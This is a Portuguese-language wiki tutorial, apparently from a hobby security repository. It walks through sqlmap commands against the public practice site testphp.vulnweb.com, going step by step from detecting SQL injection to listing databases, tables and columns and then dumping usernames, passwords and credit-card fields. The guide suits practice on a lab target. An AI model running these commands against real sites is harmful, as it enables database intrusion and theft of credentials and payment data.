SQLMAP - LittlePlantXD/CyberGamer GitHub Wiki
Guia Simplificado do Sqlmap: Comandos e Argumentos Explicados
Lembrete Rápido:
- SQL Injection: Falha que permite "injetar" comandos no banco de dados de um site.
- Sqlmap: Ferramenta para automatizar a descoberta e exploração dessas falhas.
- Alvo de Teste Seguro: http://testphp.vulnweb.com/listproducts.php?cat=1
- ⚠️ Aviso Legal: Use Sqlmap apenas com permissão. É ilegal atacar alvos sem consentimento.
Passo 1: Testar se a URL é vulnerável a SQL Injection
Objetivo: Descobrir se o site tem uma brecha de SQL Injection na URL fornecida.
Comando:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
Argumentos Usados:
-u "http://testphp.vulnweb.com/listproducts.php?cat=1"
: Especifica a URL alvo que o Sqlmap vai testar.
Como Interpretar o Resultado Principal:
- Sqlmap pode fazer perguntas interativas.
- Procure pela mensagem:
GET parameter 'cat' is vulnerable
. - Serão mostrados tipo de SGBD, versão do PHP e outros dados relevantes.
Passo 2: Listar os Bancos de Dados (Databases) do Servidor
Objetivo: Ver quais bancos de dados existem no servidor.
Comando:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
Argumentos Usados:
--dbs
: Lista todos os bancos de dados acessíveis.
Resultado Esperado:
available databases [2]:
[*] acuart
[*] information_schema
acuart
Passo 3: Listar as Tabelas dentro do Banco de Dados Objetivo: Descobrir as tabelas existentes em um banco de dados.
Comando:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
Argumentos Usados:
-D acuart
: Define o banco de dados alvo.--tables
: Lista as tabelas desse banco.
Resultado Esperado:
Database: acuart
[8 tables]
+-----------+
| artists |
| ... |
| users |
+-----------+
users
Passo 4: Listar as Colunas da Tabela Objetivo: Descobrir quais colunas existem na tabela.
Comando:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns
Argumentos Usados:
-T users
: Especifica a tabela.--columns
: Lista as colunas.
Resultado Esperado:
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| name | varchar(100) |
| cc | varchar(100) |
| pass | varchar(100) |
| uname | varchar(100) |
| ... | ... |
+---------+--------------+
users
Passo 5: Extrair (Dump) os Dados da Tabela Objetivo: Ver o conteúdo real da tabela.
Comando:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C "uname,pass,email,name,cc" --dump
Argumentos Usados:
-C "colunas"
: Define quais colunas extrair.--dump
: Faz o dump dos dados.
Resultado Esperado:
- Dados reais extraídos e exibidos no terminal.